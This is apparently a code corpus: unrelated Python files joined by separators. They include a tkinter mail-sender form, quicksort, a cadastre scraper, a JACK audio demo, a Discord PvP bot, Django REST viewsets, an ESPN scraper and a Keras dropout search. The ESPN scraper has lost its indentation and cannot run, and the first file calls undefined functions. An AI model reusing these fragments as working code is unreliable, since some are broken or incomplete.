# Build the tkinter form: sender address, password, Excel file, mail
# header text, subject, and a "send" button wired to sendmail().
root=Tk()
Label(root,text='输入发送邮箱',width=50).pack()
t1=StringVar()
e1 = Entry(root,textvariable = t1,width=45)
e1.pack()
Label(root,text='输入邮箱密码',width=50).pack()
t2=StringVar()
e2 = Entry(root,textvariable = t2,width=45,show='*')
e2.pack()
Label(root,text='execl文件',width=50).pack()
#Button(root,text='打开文件',command=openfile,width=10,height=2).pack()
#t3=StringVar()
# The file dialog opens immediately at startup; the chosen path is
# shown in a label and used by sendmail() via the module-level `path`.
t3=openfile()
e3 = Label(root,text =t3,width=45)
#t3=openfile()
e3.pack()
path=t3
Label(root,text='输入邮件头部文字内容',width=50).pack()
t4=StringVar()
e4 = Entry(root,textvariable = t4,width=45)
#t4.set('输入邮件头部文字内容')
e4.pack()
# NOTE(review): read at startup, before the user types — this value is
# dead; sendmail() re-reads t4/t5 when the button is clicked.
head=t4.get()
Label(root,text='输入邮件的主题',width=50).pack()
t5=StringVar()
e5 = Entry(root,textvariable = t5,width=45)
#t5.set('输入邮件的主题')
e5.pack()
subject=t5.get()
Button(root,text='发送邮件',command=sendmail,width=10,height=2).pack()
mainloop() |
# Quick sort
# Same idea as the reference answer; the reference version is more
# concise and uses Python more flexibly.
def quick_sort_result(array):
    """Return a sorted copy of `array` (reference quicksort).

    Bug fix: the recursive call on the "less" partition referenced an
    undefined name `quicksort`, raising NameError for any input with
    two or more elements; it now recurses on quick_sort_result.
    """
    if len(array) < 2:
        # Base case: empty or single-element lists are already sorted.
        return array
    pivot = array[0]
    less = [i for i in array[1:] if i <= pivot]
    greater = [i for i in array[1:] if i > pivot]
    return quick_sort_result(less) + [pivot] + quick_sort_result(greater)
def quick_sort_xsj(list):
    """Sort `list` ascending by recursively partitioning around its head."""
    if list == []:
        return []
    base = list[0]
    smaller = [item for item in list[1:] if item < base]
    larger_or_equal = [item for item in list[1:] if item >= base]
    return quick_sort_xsj(smaller) + [base] + quick_sort_xsj(larger_or_equal)
# Demo: sort the sample list with the hand-written quicksort.
s = [1,4,2,5,5,6,4,6,7,8,10,20]
print(quick_sort_xsj(s))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
import urllib.error
import random
from time import sleep
from src.librecatastro.domain.geometry.geo_polygon import GeoPolygon
from src.librecatastro.scrapping.searcher import Searcher
from src.settings import config
from src.utils.catastro_logger import CadastroLogger
from src.utils.list_utils import ListUtils
'''Logger'''
logger = CadastroLogger(__name__).logger
class CoordinatesSearcher(Searcher):
    """
    Class that inheritates from Searcher Abstract Class and implements
    functions regarding coordinates search.

    Improvements over the original: the bare `except:` (which also
    swallowed SystemExit/KeyboardInterrupt) now catches Exception, and
    the four-line error-logging boilerplate repeated in every method is
    extracted into _log_scrap_error().
    """

    def __init__(self):
        super().__init__()

    @staticmethod
    def _log_scrap_error(e, x_scaled, y_scaled):
        """Log a scraping exception together with the coordinates that
        triggered it (shared by every search method below)."""
        logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
        logger.error("=============================================")
        logger.error(e, exc_info=True)
        logger.error("=============================================")

    @classmethod
    def search_by_coordinates(cls, scrapper, filenames, pictures=False):
        """
        Function that searches Cadastro (HTML or XML) by coordinates
        :param scrapper: HTMLScrapper or XMLScrapper classes
        :param filenames: Names of the filenames with coordinates to scrap
        :param pictures: Do we want to scrap house plan pictures?
        """
        for r, d, files in os.walk(config['coordinates_path']):
            for file in files:
                # Honour an explicit file filter, if one was given.
                if len(filenames) > 0 and file not in filenames:
                    continue
                if '.json' not in file:
                    continue
                try:
                    polygon = GeoPolygon(os.path.join(config['coordinates_path'], file))
                    CoordinatesSearcher.search_in_polygon(scrapper, polygon, pictures)
                except Exception:
                    # Bug fix: previously a bare `except:`.
                    logger.error("{} is not formatted properly. Please take a look at the examples.".format(file))

    @classmethod
    def search_in_polygon(cls, scrapper, polygon, pictures=False):
        """
        Function that searchs by coordinates strictly inside a Polygon
        defined by the user.
        :param scrapper: HTMLScrapper or XMLScrapper classes
        :param polygon: a GeoPolygon class object
        :param pictures: Do we want to scrap house plan pictures?
        """
        bb = polygon.get_bounding_box()
        # Work in scaled integer coordinates so range() can iterate them.
        lon_min = int(bb[0] * config['scale'])
        lon_max = int(bb[2] * config['scale'])
        lat_min = int(bb[1] * config['scale'])
        lat_max = int(bb[3] * config['scale'])
        for x in range(lon_min, lon_max):
            for y in range(lat_min, lat_max):
                x_scaled = x / config['scale']
                y_scaled = y / config['scale']
                # Bounding box points outside the polygon are skipped.
                if not polygon.is_point_in_polygon(x_scaled, y_scaled):
                    continue
                ''' Adding to tracking file'''
                logger.info('{},{}'.format(x_scaled, y_scaled))
                try:
                    scrapper.process_search_by_coordinates(x_scaled, y_scaled, pictures)
                except urllib.error.HTTPError as e:
                    cls._log_scrap_error(e, x_scaled, y_scaled)
                    logger.error("...sleeping due to connection reset...")
                    logger.debug("...sleeping due to connection reset...")
                    ''' Could be a service Unavailable or denegation of service'''
                    sleep(config['sleep_dos_time'])
                except Exception as e:
                    cls._log_scrap_error(e, x_scaled, y_scaled)
                    sleep(config['sleep_time'])

    @staticmethod
    def search_by_coordinates_max_time(seconds, lon_min, lon_max, lat_min, lat_max, scrapper):
        """
        Function that allows searching in lon, lat for a maximum number of seconds.
        Mainly used for debugging purposes.
        :param seconds: Total of seconds to scrap
        :param lon_min: Minimum longitude
        :param lon_max: Maximum longitude
        :param lat_min: Minimum latitude
        :param lat_max: Maximum latitude
        :param scrapper: HTML or XML Scrapper
        :return: a List of CadasterEntry objects
        """
        start_time = time.time()
        results = []
        finished = False
        for x in range(lon_min, lon_max):
            for y in range(lat_min, lat_max):
                x_scaled = x / config['scale']
                y_scaled = y / config['scale']
                try:
                    result = scrapper.process_search_by_coordinates(x_scaled, y_scaled)
                    if result is not None:
                        results.append(result)
                    # Stop once the time budget is exhausted.
                    elapsed_time = time.time() - start_time
                    if elapsed_time > seconds:
                        finished = True
                        break
                except urllib.error.HTTPError as e:
                    CoordinatesSearcher._log_scrap_error(e, x_scaled, y_scaled)
                    ''' Could be a service Unavailable or denegation of service'''
                    sleep(config['sleep_dos_time'])
                except Exception as e:
                    CoordinatesSearcher._log_scrap_error(e, x_scaled, y_scaled)
                    sleep(config['sleep_time'])
            if finished:
                break
        return ListUtils.flat(results)

    @staticmethod
    def search_by_coordinates_linear_max_n_matches(matches, lon_min, lon_max, lat_min, lat_max, scrapper):
        """
        Function that allows searching in lon, lat for a maximum number of matches.
        Mainly used for debugging purposes.
        :param matches: Total of matches to scrap
        :param lon_min: Minimum longitude
        :param lon_max: Maximum longitude
        :param lat_min: Minimum latitude
        :param lat_max: Maximum latitude
        :param scrapper: HTML or XML Scrapper
        :return: a List of CadasterEntry objects
        """
        results = []
        counter = matches
        finished = False
        for x in range(lon_min, lon_max):
            for y in range(lat_min, lat_max):
                x_scaled = x / config['scale']
                y_scaled = y / config['scale']
                try:
                    result = scrapper.process_search_by_coordinates(x_scaled, y_scaled)
                    if result is not None:
                        results.append(result)
                        counter -= 1
                        if counter == 0:
                            finished = True
                            break
                except urllib.error.HTTPError as e:
                    CoordinatesSearcher._log_scrap_error(e, x_scaled, y_scaled)
                    ''' Could be a service Unavailable or denegation of service'''
                    sleep(config['sleep_dos_time'])
                except Exception as e:
                    CoordinatesSearcher._log_scrap_error(e, x_scaled, y_scaled)
                    sleep(config['sleep_time'])
            if finished:
                break
        return ListUtils.flat(results)

    @staticmethod
    def search_by_coordinates_random_max_n_matches(matches, lon_min, lon_max, lat_min, lat_max, scrapper):
        """
        Function that allows searching in lon, lat for a maximum number of matches.
        Mainly used for debugging purposes.
        :param matches: Total of matches to scrap
        :param lon_min: Minimum longitude
        :param lon_max: Maximum longitude
        :param lat_min: Minimum latitude
        :param lat_max: Maximum latitude
        :param scrapper: HTML or XML Scrapper
        :return: a List of CadasterEntry objects
        """
        results = []
        counter = matches
        while counter > 0:
            # Sample a random point inside the bounding box.
            x = random.randrange(lon_min, lon_max)
            y = random.randrange(lat_min, lat_max)
            x_scaled = x / config['scale']
            y_scaled = y / config['scale']
            try:
                cadaster_entry = scrapper.process_search_by_coordinates(x_scaled, y_scaled)
                if len(cadaster_entry) > 0:
                    results.append(cadaster_entry)
                    counter -= 1
                    if counter == 0:
                        break
            except urllib.error.HTTPError as e:
                CoordinatesSearcher._log_scrap_error(e, x_scaled, y_scaled)
                ''' Could be a service Unavailable or denegation of service'''
                sleep(config['sleep_dos_time'])
            except Exception as e:
                CoordinatesSearcher._log_scrap_error(e, x_scaled, y_scaled)
                sleep(config['sleep_time'])
        logger.debug("====PROCESSING FINISHED====")
        logger.debug("Results found: {}".format(matches))
        return ListUtils.flat(results)
|
# inspiration from https://github.com/spatialaudio/jackclient-python/issues/59
# 1.) play a sound into output
import numpy as np
try:
    import queue  # Python 3.x
except ImportError:
    import Queue as queue  # Python 2.x
# Bounded queues decouple audio generation from the realtime JACK callback.
queuesize = 4000
qout = queue.Queue(maxsize=queuesize)
qin = queue.Queue(maxsize=queuesize)
# Process which gets data from qout to the waiting sound client (jackd)
def process(frames):
    # JACK realtime callback: copy one queued block from qout into the output
    # port buffer, or write silence when nothing is queued.
    nothing = np.zeros(blocksize, )
    if qout.empty():
        print("empty")
        client.outports[0].get_array()[:] = nothing
    else:
        data = qout.get()
        if len(data) == 0:
            # An empty array (e.g. past the end of the source audio) also
            # produces silence.
            print("empty")
            client.outports[0].get_array()[:] = nothing
            return 0
        #print("data", data.shape, data)
        #print("stats", np.min(data), np.mean(data), np.max(data))
        client.outports[0].get_array()[:] = data
# Use queues to pass data to/from the audio backend
queuesize = 4000
blocksize = 1024
# Basic setup for the audio player in Python
import jack
client = jack.Client("thru_client")
client.blocksize = 1024
samplerate = client.samplerate
client.set_process_callback(process)
# One mono input and one mono output port.
client.inports.register('in_{0}'.format(1))
client.outports.register('out_{0}'.format(1))
i = client.inports[0]
capture = client.get_ports(is_physical=True, is_output=True)
playback = client.get_ports(is_physical=True, is_input=True, is_audio=True)
o = client.outports[0]
timeout = blocksize / samplerate
print("Processing input in %d ms frames" % (int(round(1000 * timeout))))
# Pre-fill queues
data = np.zeros((blocksize,), dtype='float32')
for k in range(1):
    qout.put_nowait(data)  # the output queue needs to be pre-filled
# 2.) load processed sound (in the same way as we will generate sounds)
# we started with spectrograms
DEMO_LOAD_FROM_SPECTROGRAMS = True
DEMO_MAKE_FROM_WAV_FILE = False
if DEMO_LOAD_FROM_SPECTROGRAMS:
    sample_rate = 44100
    #fft_settings = [2048, 1024, 512]
    fft_settings = [2048, 2024, 512] # test with longer window - should have better resolution in frq. but worse in time
    # sounds better obv...
    tmpname = "test1_withWindowSize2048"
    fft_size = fft_settings[0]
    window_size = fft_settings[1]
    hop_size = fft_settings[2]
    sequence_length = 40
    sample_rate = 44100
    if DEMO_MAKE_FROM_WAV_FILE:
        # Build the frame dataset from raw wav files (slow path).
        from utils.audio_dataset_generator import AudioDatasetGenerator
        dataset = AudioDatasetGenerator(fft_size, window_size, hop_size, sequence_length, sample_rate)
        print("loading dataset from a wav file")
        audio_data_path = "/media/vitek/Data/Vitek/Projects/2019_LONDON/music generation/small_file/"
        dataset.load(audio_data_path, force=True, prevent_shuffling=True)
        tmp_y_frames = dataset.y_frames[0:6000]
        #import numpy as np
        #np.save("data/tmp_y_frames_6000NoShuffle.npy", dataset.y_frames[0:6000])
    else:
        # Default path: load pre-converted spectrogram frames from disk.
        import numpy as np
        tmp_y_frames = np.load("data/tmp_y_frames_6000NoShuffle.npy")
        print("using converted spectrograms")
        print("tmp_y_frames hard loaded:", tmp_y_frames.shape)
def griffin_lim(stftm_matrix, max_iter=100):
    """Iterative method to 'build' phases for magnitudes (Griffin-Lim).

    Starts from a random spectrogram and alternates istft/stft, re-imposing
    the given magnitudes each round while keeping the estimated phase.
    """
    # FFT parameters come from the module-level fft_settings list.
    fft_size = fft_settings[0]
    window_size = fft_settings[1]
    hop_size = fft_settings[2]
    stft_matrix = np.random.random(stftm_matrix.shape)
    y = librosa.core.istft(stft_matrix, hop_size, window_size)
    for i in range(max_iter):
        stft_matrix = librosa.core.stft(y, fft_size, hop_size, window_size)
        # Keep the target magnitudes, keep only the estimated phase.
        stft_matrix = stftm_matrix * stft_matrix / np.abs(stft_matrix)
        y = librosa.core.istft(stft_matrix, hop_size, window_size)
    return y
# NOTE: griffin_lim reads fft_settings directly; this 1024 only shapes the
# (window_size + 1)-wide magnitude matrix below.
window_size = 1024
griffin_iterations = 60
# Stack consecutive prediction frames into one magnitude spectrogram.
predicted_magnitudes = np.asarray(tmp_y_frames[500])
#predicted_magnitudes = np.zeros(1025, )
for prediction in tmp_y_frames[500+1:2500+1]:
    predicted_magnitudes = np.vstack((predicted_magnitudes, prediction))
predicted_magnitudes = np.array(predicted_magnitudes).reshape(-1, window_size + 1)
print("predicted_magnitudes", predicted_magnitudes.shape)
# predicted_magnitudes (2001, 1025)
import librosa
# and convert the spectrograms to audio signal
audio = [griffin_lim(predicted_magnitudes.T, griffin_iterations)]
audio = np.asarray(audio[0])
print("audio.shape", audio.shape)
# window size 2048 => audio.shape (1024000,)
###### or directly reload audio signal:
"""
audio = np.load("data/tmp_audio_reconstructed.npy")
audio = np.asarray(audio[0])
print("audio hard loaded:", audio.shape)
"""
sample_rate = 44100
print("saving the audio file for inspection into data/testconcept2_testing"+tmpname+".wav")
librosa.output.write_wav('data/testconcept2_testing_'+tmpname+'.wav', audio, sample_rate)
def get_audio_random():
    """Push one block of uniform random noise samples onto the input queue."""
    noise = np.random.rand(blocksize, )
    qin.put(noise)
def get_audio_capture():
    """Grab the current JACK input-port buffer and queue it for playback."""
    captured = client.inports[0].get_array()
    qin.put(captured)
def get_audio_part_from_reconstructed_file(lenght = 1024, k=0):
    # Queue the k-th block of `lenght` samples from the reconstructed audio.
    # NOTE: 'lenght' (sic) is kept -- the main loop passes it by keyword.
    data = audio[lenght*k:lenght*(k+1)]
    qin.put(data)
# Simple example, the audio client finally starts and is fed one by one what to play
# - we get audio (generate/random/load) to qin
# - this one sample of 1024 is taken from qin and put into qout
# - client calls a process function of it (taking it from qout into the audio buffer)
k = 0
with client:
    i.connect(capture[0])
    # Connect mono file to stereo output
    o.connect(playback[0])
    o.connect(playback[1])
    while True:
        # Each one of these saves only one batch of audio of the size of 1024 samples
        if DEMO_LOAD_FROM_SPECTROGRAMS:
            get_audio_part_from_reconstructed_file(lenght=1024, k=k)
        else:
            get_audio_random()
            #get_audio_capture()
        # Relay one block from the producer queue to the playback queue.
        data = qin.get()
        qout.put(data)
        k += 1
|
# Uses python3
import sys
def get_fibonacci_last_digit(n):
    """Return the last digit of the n-th Fibonacci number.

    Last digits of Fibonacci numbers repeat with the Pisano period for
    modulus 10, which is 60 -- so only the first 60 entries are needed.
    """
    if n <= 1:
        return n
    last_digits = [0, 1]
    for _ in range(2, 60):
        last_digits.append((last_digits[-1] + last_digits[-2]) % 10)
    return last_digits[n % 60]
if __name__ == '__main__':
    # Read n from stdin and print the last digit of the n-th Fibonacci number.
    n = int(input())
    print(get_fibonacci_last_digit(n))
|
import discord
from discord.ext import commands
from discord.ext.commands import cog
from pymongo import MongoClient
import os
from dotenv import load_dotenv
import asyncio
from tools import _db, embeds, combat, _json, tools, _c
import asyncio
from discord_components import DiscordComponents, Button, ButtonStyle, InteractionType
intents = discord.Intents.default()
intents.members = True  # needed to resolve Member arguments for pvp targets
client = discord.Client(intents=intents)
load_dotenv('.env')
# Mongo connection built from env vars so credentials stay out of source.
dbclient = MongoClient(os.getenv('DBSTRING1'))
db = dbclient[os.getenv('DBSTRING2')]
class pvp(commands.Cog):
    """Player-versus-player combat cog: challenge flow, weapon selection,
    then a button-driven turn loop until one side's hp reaches 0."""

    def __init__(self, client):
        self.client = client

    @commands.Cog.listener()
    async def on_ready(self):
        # Register the components extension on the shared bot client.
        DiscordComponents(self.client)
        print ('pvp.py -> on_ready()')

    @commands.command()
    async def pvp(self, ctx, target: discord.Member, param=None):
        # PROFILE CHECKS
        if (await _db.profile_check(ctx.author.id) == 0):
            await ctx.send(embed=discord.Embed(color=0xadcca6, description = f"**{ctx.author.name}#{ctx.author.discriminator}** I couldn't find any profile linked to your account. Do `ax createprofile` to create one. Please join the [Support Server](https://discord.gg/2TCQtNs8kN) if you believe this is a mistake."))
            return
        if (await _db.profile_check(target.id) == 0):
            await ctx.send(embed=discord.Embed(color=0xadcca6, description = f"**{ctx.author.name}#{ctx.author.discriminator}** The user you're challenging doesn't have a Project Ax profile yet. Do `ax createprofile` to create one. Please join the [Support Server](https://discord.gg/2TCQtNs8kN) if you believe this is a mistake."))
            return
        # NOTE(review): the trailing comma makes buttons_1 a tuple containing the
        # button list; list(buttons_1) then yields [[accept, deny]], i.e. one row
        # of components. Looks accidental but appears to work -- confirm before
        # changing.
        buttons_1 = [
            Button(style=1, label=_c.accept(), custom_id="accept_pvp"),
            Button(style=4, label=_c.deny(), custom_id="deny_pvp")
        ],
        pvp_message = await ctx.send(embeds.pvp_message(target.display_name, ctx.author.display_name), components=list(buttons_1))
        def checkforR(res):
            # Only the challenged user, in the same channel, may respond.
            return res.user.id == target.id and res.channel.id == ctx.channel.id
        try:
            res = await self.client.wait_for("button_click", check=checkforR, timeout=15)
            await res.respond(type=6)
        except asyncio.TimeoutError:
            await _c.timeout_button(pvp_message)
            return
        if res.component.label == _c.deny():
            await _c.cancel(pvp_message)
            return
        if res.component.label == _c.accept():
            await _c.clear(pvp_message)
        # select weapons
        try:
            weapon_p = await combat.weapon_select(ctx.author, pvp_message, self.client, ctx.channel.id)
            await _c.clear(pvp_message)
            weapon_e = await combat.weapon_select(target, pvp_message, self.client, ctx.channel.id)
            await _c.clear(pvp_message)
        except asyncio.TimeoutError:
            await _c.timeout_button(pvp_message)
            return
        except:
            await _c.cancel(pvp_message)
            return
        # get players stats
        # player
        p_atk = combat.get_player_stats(weapon_p)[0]
        p_acc = combat.get_player_stats(weapon_p)[1]
        p_def = combat.get_player_stats(weapon_p)[2]
        p_hp = 500
        p_start_hp = 500
        # enemy
        e_atk = combat.get_player_stats(weapon_e)[0]
        e_acc = combat.get_player_stats(weapon_e)[1]
        e_def = combat.get_player_stats(weapon_e)[2]
        e_hp = 500
        e_start_hp = 500
        # some extra needed variables
        thumnail = "https://media.discordapp.net/attachments/804705780557021214/840565105959632926/pixil-frame-0_37.png"
        title = "TempTitle/pvp"
        enemy = target.display_name
        player = ctx.author.display_name
        hit_or_miss_p = ""
        hit_or_miss_d = ""
        miss_counter_p = ""
        miss_counter_d = ""
        hit_counter_p = ""
        hit_counter_d = ""
        player_move_indicator = ""
        enemy_move_indicator = ""
        comment = "Happy Project Ax fighting, and may the odds be ever in your favor."
        moves = 0
        # display embed before actual combat
        def display_pvp_embed():
            # Closure over the combat state above; re-renders the status embed.
            return embeds.pvp_combat_embed(p_hp, p_atk, p_acc, p_def, e_hp, e_atk, e_acc, e_def, thumnail, title, enemy, player, comment, hit_or_miss_p, hit_or_miss_d, miss_counter_p, miss_counter_d, hit_counter_p, hit_counter_d, moves, player_move_indicator, enemy_move_indicator, tools.ismain())
        await pvp_message.edit(embed=display_pvp_embed())
        await pvp_message.edit(content=f"**{player}** Your turn! Click a button to make a move.\n\n{comment}")
        healing_potion_emote = self.client.get_emoji(_json.get_emote_id("healing_potion"))
        # add buttons
        # NOTE(review): same trailing-comma tuple shape as buttons_1 above.
        buttons_2 = [
            Button(style=4, label="ATK", emoji='⚔️', custom_id="ATK_pvp"),
            Button(style=1, label="DEF", emoji='🛡️', custom_id="DEF_pvp"),
            Button(style=3, label="Heal", emoji=healing_potion_emote, custom_id="Heal_pvp"),
        ],
        await pvp_message.edit(components=list(buttons_2))
        def checkforR2(res):
            # Target's clicks only.
            return res.user.id == target.id and res.channel.id == ctx.channel.id
        def checkforR3(res):
            # Challenger's clicks only.
            return res.user.id == ctx.author.id and res.channel.id == ctx.channel.id
        # pvp starts
        while p_hp > 0 and e_hp > 0:
            if moves%2 != 0:
                ## PLAYER MOVE
                await pvp_message.edit(content=f"**{player}** Your turn! Click a button to make a move.\n\n{comment}")
                try:
                    res = await self.client.wait_for('button_click', timeout=10, check=checkforR3)
                    await res.respond(type=6)
                except:
                    await _c.timeout_button(pvp_message)
                    return
                if res.component.label.startswith("ATK"):
                    # NOTE(review): pvp_atk is called twice; the second call sees
                    # the already-reduced e_hp, so the comment may describe a
                    # different roll than the one applied. Confirm against
                    # combat.pvp_atk.
                    e_hp = combat.pvp_atk(e_hp, p_atk, p_acc, e_def, player)[1]
                    comment = str(combat.pvp_atk(e_hp, p_atk, p_acc, e_def, player)[2])
                elif res.component.label.startswith("DEF"):
                    pass
                elif res.component.label.startswith("Heal"):
                    # Heal 10% of current hp, capped at the starting hp.
                    incr = p_hp*0.1
                    if p_hp != p_start_hp:
                        if p_start_hp < (p_hp+incr):
                            incr = p_start_hp - p_hp
                        p_hp += incr
                        comment = f"{player} healed! Their health increased with {incr} points."
                    else:
                        if p_hp == p_start_hp:
                            comment = f"{player} tried to heal but their health is already maxed."
            else:
                ## ENEMY MOVE
                # NOTE(review): the enemy's click is awaited but no ATK/DEF/Heal
                # effect is applied here -- confirm whether enemy action handling
                # is missing or lives elsewhere.
                await pvp_message.edit(content=f"**{enemy}** Your turn! React to this message to make a move.\n\n{comment}")
                try:
                    res = await self.client.wait_for('button_click', timeout=10, check=checkforR2)
                    await res.respond(type=6)
                except:
                    await _c.timeout_button(pvp_message)
                    return
            await pvp_message.edit(embed=display_pvp_embed())
            await pvp_message.edit(content=f"{pvp_message.content}\n\n{comment}")
            comment = ""
            moves+=1
def setup(client):
    # discord.py extension entry point: register the pvp cog on the bot.
    client.add_cog(pvp(client))
|
from rest_framework import permissions
from rest_framework import viewsets, status, mixins
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from posts.api import serializers
from posts.api.pagination import PostPagination, LikePagination
from posts.api.serializers import get_like_serializer
from posts.models import Post, Like
class PostCRSet(mixins.CreateModelMixin, mixins.ListModelMixin, viewsets.GenericViewSet):
    """Create/list viewset for posts; `get` additionally serves a single post."""
    queryset = Post.objects.all()
    serializer_class = serializers.PostDetailSerializer
    permission_classes = [permissions.IsAuthenticated]
    pagination_class = PostPagination

    def perform_create(self, serializer):
        # Attach the authenticated user as the post author.
        serializer.save(user=self.request.user)

    def get(self, request, id=None, **kwargs):
        # Manual retrieve-by-pk; 404s when the post does not exist.
        # NOTE(review): RetrieveModelMixin would provide this -- confirm the
        # router actually maps detail GETs to this method.
        queryset = Post.objects.all()
        post = get_object_or_404(queryset, pk=id)
        serializer = serializers.PostDetailSerializer(post)
        return Response(serializer.data)
class LikeCreateListDeleteViewSet(mixins.CreateModelMixin, mixins.ListModelMixin, viewsets.GenericViewSet):
    """Likes scoped to a post: the post id comes from the URL kwargs."""
    queryset = Like.objects.all()
    permission_classes = [permissions.IsAuthenticated]
    # Name of the URL kwarg carrying the parent post's id.
    post_id_qs_param = 'post_id'
    pagination_class = LikePagination

    def perform_create(self, serializer):
        # Bind the like to both the authenticated user and the URL's post.
        post_id = self.kwargs.get(self.post_id_qs_param)
        serializer.save(user_id=self.request.user.id, post_id=post_id)

    def list(self, request, **kwargs):
        # Newest-first likes for this post, paginated when a paginator is set.
        post_id = self.kwargs.get(self.post_id_qs_param)
        queryset = Like.objects.filter(post_id=post_id).order_by("-created_at")
        page = self.paginate_queryset(queryset)
        if page is not None:
            serializer = self.get_serializer(page, many=True)
            return self.get_paginated_response(serializer.data)
        serializer = self.get_serializer(queryset, many=True)
        return Response(serializer.data)

    def get_serializer_class(self):
        # Serializer is built per-request so it can see the post and user.
        post_id = self.kwargs.get(self.post_id_qs_param)
        return get_like_serializer(
            post_id=post_id,
            user=self.request.user
        )
|
import numpy as np
import pandas as pd
import sys, requests, time
root_path = '/home/samir/Statistics/football/'
sys.path.append(root_path)
from football_utilities import split_espn_plr
def get_espn_proj_wk(wk):
url_str = 'http://games.espn.com/ffl/tools/projections?&scoringPeriodId=%d&seasonId=2016&slotCategoryId=%d&startIndex=%d'
columns = ['Player', 'Opp', 'GameTime', 'Cmp_Att', 'PsYds', 'PsTD', 'Int', 'RsAtt', 'RsYds', 'RsTD', 'Rec', 'RcYds', 'RcTD', 'FFPts']
proj = pd.DataFrame()
keep_going = True
for id, pos in zip([0, 2, 4, 6, 16, 17], ['QB', 'RB', 'WR', 'TE', 'DST', 'K']):
idx = 0
while True:
url = url_str %(wk, id, idx)
print pos, idx
r = requests.get(url)
d = pd.read_html(r.content, attrs={'id': 'playertable_0'})
assert len(d) == 1
d = d[0]
if d.shape[0] == 1:
break
d.drop(range(2), inplace=True)
d.columns = columns
d.insert(2, 'Pos', pos)
proj = pd.concat([proj, d])
idx += 40
info = proj.Player.apply(split_espn_plr)
proj['Player'] = [i[0] for i in info]
proj.insert(2, 'Team', [i[1] for i in info])
proj = proj.replace('--', np.nan)
proj = proj.apply(pd.to_numeric, errors='ignore')
proj.reset_index(drop=True, inplace=True)
proj.to_csv('Data/Projections/ESPN/Wk%d/ESPN_Projections_2016Wk%d_%s.csv' %(wk, wk, time.strftime('%Y%m%d')), index=False)
return proj
|
#!~/anaconda3/bin/python3.6
# encoding: utf-8
"""
@author: Yongbo Wang
@file: ToxicClassification - Tune_dropout_rate.py
@time: 9/2/18 8:30 AM
"""
import numpy as np
import pandas as pd
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Dense, Input, LSTM, Embedding, Dropout
from keras.layers import Bidirectional, GlobalMaxPool1D
from keras.models import Model
from keras import optimizers
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
DATA_PATH = '../input'
EMBEDDING_FILE = f'{DATA_PATH}/glove6b50d/glove.6B.50d.txt'
TRAIN_DATA_FILE = f'{DATA_PATH}/train.csv'
TEST_DATA_FILE = f'{DATA_PATH}/test.csv'
embed_size = 50        # GloVe vector dimensionality
max_features = 20000   # vocabulary cap
maxlen = 100           # padded comment length in tokens
train = pd.read_csv(TRAIN_DATA_FILE)
test = pd.read_csv(TEST_DATA_FILE)
list_sentences_train = train["comment_text"].fillna("_na_").values
list_classes = ["toxic", "severe_toxic", "obscene", "threat", "insult", "identity_hate"]
y = train[list_classes].values
list_sentences_test = test["comment_text"].fillna("_na_").values
# Fit the tokenizer on train text only, then index both splits.
tokenizer = Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(list(list_sentences_train))
list_tokenized_train = tokenizer.texts_to_sequences(list_sentences_train)
list_tokenized_test = tokenizer.texts_to_sequences(list_sentences_test)
X_t = pad_sequences(list_tokenized_train, maxlen=maxlen)
X_te = pad_sequences(list_tokenized_test, maxlen=maxlen)
def get_trans(word, *arr):
    """Split one GloVe line into (token, float32 vector)."""
    vector = np.asarray(arr, dtype='float32')
    return word, vector
# Parse the whole GloVe file into {word: vector}.
embeddings_index = dict(get_trans(*o.strip().split()) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean, emb_std = all_embs.mean(), all_embs.std()
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
# Words without a GloVe vector keep a random row drawn to match the
# embedding distribution's mean/std.
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
    if i >= max_features:
        continue
    embedding_vector = embeddings_index.get(word)
    if embedding_vector is not None:
        embedding_matrix[i] = embedding_vector
def create_model(dropout_rate=0.0):
    """Build the BiLSTM toxic-comment classifier.

    dropout_rate is the grid-searched dropout applied after the dense layer;
    the LSTM's own dropout values stay fixed.
    """
    inp = Input(shape=(maxlen,))
    x = Embedding(max_features, embed_size, weights=[embedding_matrix])(inp)
    x = Bidirectional(LSTM(50, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(x)
    x = GlobalMaxPool1D()(x)
    x = Dense(50, activation="relu")(x)
    x = Dropout(dropout_rate)(x)
    x = Dense(6, activation="sigmoid")(x)  # one sigmoid per label (multi-label)
    model = Model(inputs=inp, outputs=x)
    optimizer = optimizers.Adam(lr=0.001)
    model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    return model
model = KerasClassifier(build_fn=create_model, verbose=0)
dropout_rate = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
param_grid = dict(dropout_rate=dropout_rate)
# 3-fold grid search over the dropout rate, parallelized across cores.
grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1, cv=3)
grid_result = grid.fit(X_t, y, verbose=1, batch_size=10, epochs=2, validation_split=0.1)
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
    print("%f (%f) with: %r" % (mean, stdev, param))
|
from behave import given, when, then
@given('character creation is "{state}"')
def step_impl(context, state):
    # Toggle the form only if its current visibility differs from the
    # desired 'shown'/'hidden' state.
    if (state == 'shown') != context.browser.find_element_by_css_selector('form.char-form').is_displayed():
        context.browser.find_element_by_id('add-char').click()
@when('user toggles character creation')
def step_impl(context):
    # Clicking the add-char control flips the form's visibility.
    context.browser.find_element_by_id('add-char').click()
@then('character form is "{display}"')
def step_impl(context, display):
    # Assert the form's visibility matches the expected display state.
    # `==` instead of the original `is`: identity comparison on booleans only
    # works for the True/False singletons and would misbehave if the driver
    # ever returned a non-bool truthy value.
    assert (display == 'shown') == context.browser.find_element_by_css_selector('form.char-form').is_displayed()
|
#054: Introduction to Pattern Matching
#http://rosalind.info/problems/trie/
#Given: A list of at most 100 DNA strings of length at most 100 bp, none of which is a prefix of another.
